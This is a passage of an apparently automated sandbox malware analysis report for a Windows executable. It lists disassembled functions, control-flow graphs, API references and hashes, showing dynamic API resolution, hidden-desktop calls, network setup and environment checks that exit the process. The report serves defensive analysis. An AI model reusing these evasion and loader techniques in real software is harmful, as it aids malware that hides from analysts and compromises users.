8e162b lstrcpy 28609->28610 28611 8e1633 28609->28611 28610->28611 28612 8e164d lstrcpy 28611->28612 28613 8e1655 28611->28613 28612->28613 28614 8e166f lstrcpy 28613->28614 28615 8e1677 28613->28615 28614->28615 28616 8e1699 28615->28616 28617 8e1691 lstrcpy 28615->28617 28616->28301 28617->28616 28619 9073f6 28618->28619 28620 902a30 28619->28620 28621 90740c lstrcpy 28619->28621 28620->27444 28621->28620 28623 8e4bd0 28622->28623 28623->28623 28624 8e4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 28623->28624 28625 8e4c41 28624->28625 28625->28409 28627 904053 28626->28627 28628 90406f lstrcpy 28627->28628 28629 90407b 28627->28629 28628->28629 28630 9040a5 GetSystemTime 28629->28630 28631 90409d lstrcpy 28629->28631 28632 9040c3 28630->28632 28631->28630 28632->28428 28634 90753d 28633->28634 28635 8e519b 28634->28635 28636 90754d lstrcpy lstrcat 28634->28636 28637 907490 28635->28637 28636->28635 28639 90749c 28637->28639 28638 9074c4 28638->28484 28639->28638 28640 9074bc lstrcpy 28639->28640 28640->28638 28642 9074ec 28641->28642 28643 8e51b7 28642->28643 28644 9074fd lstrcpy lstrcat 28642->28644 28643->28487 28644->28643 28698 9033c0 GetSystemInfo wsprintfA 28649 8f8755 47 API calls 28682 8fe2d9 140 API calls 28650 8ff4d8 93 API calls 28661 8f4dd7 295 API calls 28674 90a490 __CxxFrameHandler 28693 903270 GetSystemPowerStatus 28710 902b70 GetCurrentProcess IsWow64Process 28662 8f25e9 290 API calls 28654 8e5869 57 API calls 28663 902de0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 28651 8f24f9 298 API calls 28655 8e8c79 strlen 28700 8ebbf9 90 API calls 28713 8e1b64 162 API calls

                            Executed Functions

                            Function 009068F0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 9068f0-9068f7 634 9068fd-906d09 GetProcAddress * 43 633->634 635 906d0e-906da2 LoadLibraryA * 8 633->635 634->635 636 906da4-906e13 GetProcAddress * 5 635->636 637 906e18-906e1f 635->637 636->637 638 906ee2-906ee9 637->638 639 906e25-906edd GetProcAddress * 8 637->639 640 906eeb-906f5a GetProcAddress * 5 638->640 641 906f5f-906f66 638->641 639->638 640->641 642 906ff9-907000 641->642 643 906f6c-906ff4 GetProcAddress * 6 641->643 644 907120-907127 642->644 645 907006-90711b GetProcAddress * 12 642->645 643->642 646 907129-907198 GetProcAddress * 5 644->646 647 90719d-9071a4 644->647 645->644 646->647 648 9071d1-9071d8 647->648 649 9071a6-9071cc GetProcAddress * 2 647->649 650 907205-90720c 648->650 651 9071da-907200 GetProcAddress * 2 648->651 649->648 652 907212-9072f8 GetProcAddress * 10 650->652 653 9072fd-907304 650->653 651->650 652->653 654 907362-907369 653->654 655 907306-90735d GetProcAddress * 4 653->655 656 90736b-907379 GetProcAddress 654->656 657 90737e-907385 654->657 655->654 656->657 658 9073e3 657->658 659 907387-9073de GetProcAddress * 4 657->659 659->658
                            APIs
                            • GetProcAddress.KERNEL32(76210000,012E66F8), ref: 00906905
                            • GetProcAddress.KERNEL32(76210000,012E66D8), ref: 0090691D
                            • GetProcAddress.KERNEL32(76210000,012F97B8), ref: 00906936
                            • GetProcAddress.KERNEL32(76210000,012F9818), ref: 0090694E
                            • GetProcAddress.KERNEL32(76210000,012F9830), ref: 00906966
                            • GetProcAddress.KERNEL32(76210000,012FD938), ref: 0090697F
                            • GetProcAddress.KERNEL32(76210000,012EA8E0), ref: 00906997
                            • GetProcAddress.KERNEL32(76210000,012FDA58), ref: 009069AF
                            • GetProcAddress.KERNEL32(76210000,012FDAB8), ref: 009069C8
                            • GetProcAddress.KERNEL32(76210000,012FDB18), ref: 009069E0
                            • GetProcAddress.KERNEL32(76210000,012FD980), ref: 009069F8
                            • GetProcAddress.KERNEL32(76210000,012E6718), ref: 00906A11
                            • GetProcAddress.KERNEL32(76210000,012E6738), ref: 00906A29
                            • GetProcAddress.KERNEL32(76210000,012E6758), ref: 00906A41
                            • GetProcAddress.KERNEL32(76210000,012E6778), ref: 00906A5A
                            • GetProcAddress.KERNEL32(76210000,012FD8C0), ref: 00906A72
                            • GetProcAddress.KERNEL32(76210000,012FD8F0), ref: 00906A8A
                            • GetProcAddress.KERNEL32(76210000,012EA598), ref: 00906AA3
                            • GetProcAddress.KERNEL32(76210000,012E65B8), ref: 00906ABB
                            • GetProcAddress.KERNEL32(76210000,012FD890), ref: 00906AD3
                            • GetProcAddress.KERNEL32(76210000,012FDAE8), ref: 00906AEC
                            • GetProcAddress.KERNEL32(76210000,012FD998), ref: 00906B04
                            • GetProcAddress.KERNEL32(76210000,012FDAA0), ref: 00906B1C
                            • GetProcAddress.KERNEL32(76210000,012E6798), ref: 00906B35
                            • GetProcAddress.KERNEL32(76210000,012FD9E0), ref: 00906B4D
                            • GetProcAddress.KERNEL32(76210000,012FDB30), ref: 00906B65
                            • GetProcAddress.KERNEL32(76210000,012FDB48), ref: 00906B7E
                            • GetProcAddress.KERNEL32(76210000,012FDA70), ref: 00906B96
                            • GetProcAddress.KERNEL32(76210000,012FD9B0), ref: 00906BAE
                            • GetProcAddress.KERNEL32(76210000,012FDB60), ref: 00906BC7
                            • GetProcAddress.KERNEL32(76210000,012FD878), ref: 00906BDF
                            • GetProcAddress.KERNEL32(76210000,012FDA88), ref: 00906BF7
                            • GetProcAddress.KERNEL32(76210000,012FD8A8), ref: 00906C10
                            • GetProcAddress.KERNEL32(76210000,012EF8F8), ref: 00906C28
                            • GetProcAddress.KERNEL32(76210000,012FDA10), ref: 00906C40
                            • GetProcAddress.KERNEL32(76210000,012FD8D8), ref: 00906C59
                            • GetProcAddress.KERNEL32(76210000,012E65D8), ref: 00906C71
                            • GetProcAddress.KERNEL32(76210000,012FDAD0), ref: 00906C89
                            • GetProcAddress.KERNEL32(76210000,012E67B8), ref: 00906CA2
                            • GetProcAddress.KERNEL32(76210000,012FD908), ref: 00906CBA
                            • GetProcAddress.KERNEL32(76210000,012FD920), ref: 00906CD2
                            • GetProcAddress.KERNEL32(76210000,012E67D8), ref: 00906CEB
                            • GetProcAddress.KERNEL32(76210000,012E6878), ref: 00906D03
                            • LoadLibraryA.KERNEL32(012FD950,009006EF), ref: 00906D15
                            • LoadLibraryA.KERNEL32(012FD9C8), ref: 00906D26
                            • LoadLibraryA.KERNEL32(012FD9F8), ref: 00906D38
                            • LoadLibraryA.KERNEL32(012FDA28), ref: 00906D4A
                            • LoadLibraryA.KERNEL32(012FD968), ref: 00906D5B
                            • LoadLibraryA.KERNEL32(012FDA40), ref: 00906D6D
                            • LoadLibraryA.KERNEL32(012FDB00), ref: 00906D7F
                            • LoadLibraryA.KERNEL32(012FDDD0), ref: 00906D90
                            • GetProcAddress.KERNEL32(751E0000,012E62F8), ref: 00906DAC
                            • GetProcAddress.KERNEL32(751E0000,012FDC20), ref: 00906DC4
                            • GetProcAddress.KERNEL32(751E0000,012F9220), ref: 00906DDD
                            • GetProcAddress.KERNEL32(751E0000,012FDB90), ref: 00906DF5
                            • GetProcAddress.KERNEL32(751E0000,012E6498), ref: 00906E0D
                            • GetProcAddress.KERNEL32(701C0000,012EA638), ref: 00906E2D
                            • GetProcAddress.KERNEL32(701C0000,012E64B8), ref: 00906E45
                            • GetProcAddress.KERNEL32(701C0000,012EA6D8), ref: 00906E5E
                            • GetProcAddress.KERNEL32(701C0000,012FDD70), ref: 00906E76
                            • GetProcAddress.KERNEL32(701C0000,012FDCB0), ref: 00906E8E
                            • GetProcAddress.KERNEL32(701C0000,012E6138), ref: 00906EA7
                            • GetProcAddress.KERNEL32(701C0000,012E6258), ref: 00906EBF
                            • GetProcAddress.KERNEL32(701C0000,012FDC38), ref: 00906ED7
                            • GetProcAddress.KERNEL32(753A0000,012E6158), ref: 00906EF3
                            • GetProcAddress.KERNEL32(753A0000,012E6438), ref: 00906F0B
                            • GetProcAddress.KERNEL32(753A0000,012FDB78), ref: 00906F24
                            • GetProcAddress.KERNEL32(753A0000,012FDC68), ref: 00906F3C
                            • GetProcAddress.KERNEL32(753A0000,012E60F8), ref: 00906F54
                            • GetProcAddress.KERNEL32(76310000,012EA700), ref: 00906F74
                            • GetProcAddress.KERNEL32(76310000,012EA728), ref: 00906F8C
                            • GetProcAddress.KERNEL32(76310000,012FDE30), ref: 00906FA5
                            • GetProcAddress.KERNEL32(76310000,012E6178), ref: 00906FBD
                            • GetProcAddress.KERNEL32(76310000,012E6238), ref: 00906FD5
                            • GetProcAddress.KERNEL32(76310000,012EA778), ref: 00906FEE
                            • GetProcAddress.KERNEL32(76910000,012FDD10), ref: 0090700E
                            • GetProcAddress.KERNEL32(76910000,012E6478), ref: 00907026
                            • GetProcAddress.KERNEL32(76910000,012F9250), ref: 0090703F
                            • GetProcAddress.KERNEL32(76910000,012FDDB8), ref: 00907057
                            • GetProcAddress.KERNEL32(76910000,012FDE48), ref: 0090706F
                            • GetProcAddress.KERNEL32(76910000,012E60D8), ref: 00907088
                            • GetProcAddress.KERNEL32(76910000,012E6198), ref: 009070A0
                            • GetProcAddress.KERNEL32(76910000,012FDC50), ref: 009070B8
                            • GetProcAddress.KERNEL32(76910000,012FDE18), ref: 009070D1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 009070E7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 009070FE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00907115
                            • GetProcAddress.KERNEL32(75B30000,012E6298), ref: 00907131
                            • GetProcAddress.KERNEL32(75B30000,012FDD40), ref: 00907149
                            • GetProcAddress.KERNEL32(75B30000,012FDBC0), ref: 00907162
                            • GetProcAddress.KERNEL32(75B30000,012FDC80), ref: 0090717A
                            • GetProcAddress.KERNEL32(75B30000,012FDC08), ref: 00907192
                            • GetProcAddress.KERNEL32(75670000,012E61B8), ref: 009071AE
                            • GetProcAddress.KERNEL32(75670000,012E6118), ref: 009071C6
                            • GetProcAddress.KERNEL32(76AC0000,012E61D8), ref: 009071E2
                            • GetProcAddress.KERNEL32(76AC0000,012FDE60), ref: 009071FA
                            • GetProcAddress.KERNEL32(6F4E0000,012E61F8), ref: 0090721A
                            • GetProcAddress.KERNEL32(6F4E0000,012E62B8), ref: 00907232
                            • GetProcAddress.KERNEL32(6F4E0000,012E6218), ref: 0090724B
                            • GetProcAddress.KERNEL32(6F4E0000,012FDC98), ref: 00907263
                            • GetProcAddress.KERNEL32(6F4E0000,012E6278), ref: 0090727B
                            • GetProcAddress.KERNEL32(6F4E0000,012E62D8), ref: 00907294
                            • GetProcAddress.KERNEL32(6F4E0000,012E6358), ref: 009072AC
                            • GetProcAddress.KERNEL32(6F4E0000,012E6318), ref: 009072C4
                            • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 009072DB
                            • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 009072F2
                            • GetProcAddress.KERNEL32(75AE0000,012FDD58), ref: 0090730E
                            • GetProcAddress.KERNEL32(75AE0000,012F90F0), ref: 00907326
                            • GetProcAddress.KERNEL32(75AE0000,012FDDE8), ref: 0090733F
                            • GetProcAddress.KERNEL32(75AE0000,012FDBA8), ref: 00907357
                            • GetProcAddress.KERNEL32(76300000,012E6338), ref: 00907373
                            • GetProcAddress.KERNEL32(6E970000,012FDBD8), ref: 0090738F
                            • GetProcAddress.KERNEL32(6E970000,012E6378), ref: 009073A7
                            • GetProcAddress.KERNEL32(6E970000,012FDE00), ref: 009073C0
                            • GetProcAddress.KERNEL32(6E970000,012FDCC8), ref: 009073D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: b008fb01ce8bde873b3169ef7b423d644a6170262e378f988e609b5fef1dc5fd
                            • Instruction ID: 9ac01a6f8de402ddade8e8746a7cd23083985ed1e36e59c41ed503ef868d98ca
                            • Opcode Fuzzy Hash: b008fb01ce8bde873b3169ef7b423d644a6170262e378f988e609b5fef1dc5fd
                            • Instruction Fuzzy Hash: 53623DB5A10280EFD754DF64ECACAE637BAF78C641390C929E956C3364DF34A841DB60
                            Function 008E4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E4C7F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4CD2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D05
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D35
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4D73
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E4DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E4DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 6d948dd06f9efcb0baaef8b4e53d4427ca0b2381357c5f40c0a537ac15f416e1
                            • Instruction ID: fb7d6c599de237f30be1c6cb3ab2b53dac43a34a47556d33e9a843792cdd1468
                            • Opcode Fuzzy Hash: 6d948dd06f9efcb0baaef8b4e53d4427ca0b2381357c5f40c0a537ac15f416e1
                            • Instruction Fuzzy Hash: 9C529C72900296AFCB21AFB9DC49BAEBBB9FF45314F145024F805E7251DB70ED428B91
                            Function 009065A0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2038 9065a0-9065cd GetPEB 2039 9067d3-906833 LoadLibraryA * 5 2038->2039 2040 9065d3-9067ce call 906500 GetProcAddress * 20 2038->2040 2042 906835-906843 GetProcAddress 2039->2042 2043 906848-90684f 2039->2043 2040->2039 2042->2043 2045 906851-906877 GetProcAddress * 2 2043->2045 2046 90687c-906883 2043->2046 2045->2046 2047 906885-906893 GetProcAddress 2046->2047 2048 906898-90689f 2046->2048 2047->2048 2049 9068a1-9068af GetProcAddress 2048->2049 2050 9068b4-9068bb 2048->2050 2049->2050 2052 9068e7-9068ea 2050->2052 2053 9068bd-9068e2 GetProcAddress * 2 2050->2053 2053->2052
                            APIs
                            • GetProcAddress.KERNEL32(76210000,012F1728), ref: 009065F9
                            • GetProcAddress.KERNEL32(76210000,012F1608), ref: 00906612
                            • GetProcAddress.KERNEL32(76210000,012F1590), ref: 0090662A
                            • GetProcAddress.KERNEL32(76210000,012F1710), ref: 00906642
                            • GetProcAddress.KERNEL32(76210000,012F90B0), ref: 0090665B
                            • GetProcAddress.KERNEL32(76210000,012E64D8), ref: 00906673
                            • GetProcAddress.KERNEL32(76210000,012E6558), ref: 0090668B
                            • GetProcAddress.KERNEL32(76210000,012F16B0), ref: 009066A4
                            • GetProcAddress.KERNEL32(76210000,012F1650), ref: 009066BC
                            • GetProcAddress.KERNEL32(76210000,012F1548), ref: 009066D4
                            • GetProcAddress.KERNEL32(76210000,012F1740), ref: 009066ED
                            • GetProcAddress.KERNEL32(76210000,012E6638), ref: 00906705
                            • GetProcAddress.KERNEL32(76210000,012F1560), ref: 0090671D
                            • GetProcAddress.KERNEL32(76210000,012F16C8), ref: 00906736
                            • GetProcAddress.KERNEL32(76210000,012E6698), ref: 0090674E
                            • GetProcAddress.KERNEL32(76210000,012F1770), ref: 00906766
                            • GetProcAddress.KERNEL32(76210000,012F1788), ref: 0090677F
                            • GetProcAddress.KERNEL32(76210000,012E6838), ref: 00906797
                            • GetProcAddress.KERNEL32(76210000,012F1878), ref: 009067AF
                            • GetProcAddress.KERNEL32(76210000,012E64F8), ref: 009067C8
                            • LoadLibraryA.KERNEL32(012F1818,?,?,?,00901DD3), ref: 009067D9
                            • LoadLibraryA.KERNEL32(012F1848,?,?,?,00901DD3), ref: 009067EB
                            • LoadLibraryA.KERNEL32(012F1830,?,?,?,00901DD3), ref: 009067FD
                            • LoadLibraryA.KERNEL32(012F1860,?,?,?,00901DD3), ref: 0090680E
                            • LoadLibraryA.KERNEL32(012F17E8,?,?,?,00901DD3), ref: 00906820
                            • GetProcAddress.KERNEL32(75B30000,012F1890), ref: 0090683D
                            • GetProcAddress.KERNEL32(751E0000,012F1800), ref: 00906859
                            • GetProcAddress.KERNEL32(751E0000,012F18A8), ref: 00906871
                            • GetProcAddress.KERNEL32(76910000,012F9728), ref: 0090688D
                            • GetProcAddress.KERNEL32(75670000,012E67F8), ref: 009068A9
                            • GetProcAddress.KERNEL32(77310000,012F91A0), ref: 009068C5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 009068DC
                            Strings
                            • NtQueryInformationProcess, xrefs: 009068D1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 502f633ea6f90c33eec4dbc962f1d794177604d5781fc7c30389e1525f9911f8
                            • Instruction ID: 3f91a722bc0abc19a7e82d59e2ff2186bcb9d72d3a13f36b31f23390718e3b73
                            • Opcode Fuzzy Hash: 502f633ea6f90c33eec4dbc962f1d794177604d5781fc7c30389e1525f9911f8
                            • Instruction Fuzzy Hash: 6FA14EB5A11280EFD754DF64ECACAA637B9F78C641380C929E916C3364DF34A901DF60
                            Function 008E2A90 Relevance: 57.7, Strings: 46, Instructions: 224COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2054 8e2a90-8e2e5a call 8e4a60 * 43
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: :7<!x#%#$0CPAFHU8B2I0TBE0QZ18$1PAA2HJUEHALF$2D9XJ6M6$2JGV2Z9M9HQ4$4RGJ5NO4L$5BYHYEUK$7WZ1RIA9DDAAJ6$8A[6^#$8EXMUG92ROKG$95PKY$9JMCW9XCBDGEZU6YCVRN$9RFHO2G1$AT38YGATL2$C3YXFWQ7050E$CJYY5GIZUPTTZO$E3QE08QC8II8$ELQKM9K5O5Q$HTNR912K0PEF$INQLMGW4YZXC8RFTL$K28W0E$K5U7CGV5ONS$KKWWRXQ7KU2Y$KT3M1IM293$L0S2JTDCK$MSHN6QKQEMU$N2INC4PY7KDGDMSKU7I3$NNSPMVGIO$NR7FVO5$O46TOKO7UJ1$R9R37GL6PWFTV$REP8MZKJOIEOI$RN3BIQNGMZ10L1KLZK$STVZ79L0Z$TLJMUC$U!2:,B>p$VA7FTZGOASO5C37$VJ1ZSUA1VCWE448X$W0SD8LNKF$XOFQRZLRSI5C00OYT5OS$XP982EDIEXR$Y1-::$!$Z574GK0$^7M*&S#w$jY5.)$p2.a &"x 3$9E
                            • API String ID: 1542196881-3058762087
                            • Opcode ID: 02428c790af0e3cf48282c432d519536015ea7bfd6fa7208ecc8e482a8c0b9db
                            • Instruction ID: 4faa571310a00647cec36b3f2305f3e8c4a9786a31075286a355dbf59f8d4008
                            • Opcode Fuzzy Hash: 02428c790af0e3cf48282c432d519536015ea7bfd6fa7208ecc8e482a8c0b9db
                            • Instruction Fuzzy Hash: CE7134B8BC938CB6D610EB626C07FC53550BBD1B59F409466B326BB2D2EEF051C08A49
                            Function 00901DC0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 901dc0-901ddb call 8e2a90 call 9065a0 2146 901dea-901df7 call 8e2930 2141->2146 2147 901ddd 2141->2147 2151 901e05-901e33 2146->2151 2152 901df9-901dff lstrcpy 2146->2152 2148 901de0-901de8 2147->2148 2148->2146 2148->2148 2156 901e35-901e37 ExitProcess 2151->2156 2157 901e3d-901e4b GetSystemInfo 2151->2157 2152->2151 2158 901e55-901e70 call 8e1030 call 8e10c0 GetUserDefaultLangID 2157->2158 2159 901e4d-901e4f ExitProcess 2157->2159 2164 901e72-901e79 2158->2164 2165 901e88-901e9a call 902ca0 call 903fe0 2158->2165 2164->2165 2166 901e80-901e82 ExitProcess 2164->2166 2171 901eb7-901ed6 lstrlen call 8e2930 2165->2171 2172 901e9c-901eae call 902c10 call 903fe0 2165->2172 2178 901ef3-901f10 lstrlen call 8e2930 2171->2178 2179 901ed8-901edd 2171->2179 2172->2171 2183 901eb0-901eb1 ExitProcess 2172->2183 2186 901f12-901f14 2178->2186 2187 901f2a-901f4b call 902ca0 lstrlen call 8e2930 2178->2187 2179->2178 2181 901edf-901ee1 2179->2181 2181->2178 2184 901ee3-901eed lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2188 901f16-901f24 lstrcpy lstrcat 2186->2188 2193 901f6a-901f84 lstrlen call 8e2930 2187->2193 2194 901f4d-901f4f 2187->2194 2188->2187 2199 901f86-901f88 2193->2199 2200 901f9e-901fbb call 902c10 lstrlen call 8e2930 2193->2200 2194->2193 2195 901f51-901f55 2194->2195 2195->2193 2197 901f57-901f64 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 901f8a-901f98 lstrcpy lstrcat 2199->2201 2206 901fda-901fdf 2200->2206 2207 901fbd-901fbf 2200->2207 2201->2200 2209 901fe1 call 8e2a20 2206->2209 2210 901fe6-901ff2 call 8e2930 2206->2210 2207->2206 2208 901fc1-901fc5 2207->2208 2208->2206 2211 901fc7-901fd4 lstrcpy lstrcat 2208->2211 2209->2210 2215 902000-902036 call 8e2a20 * 5 OpenEventA 2210->2215 2216 901ff4-901ff6 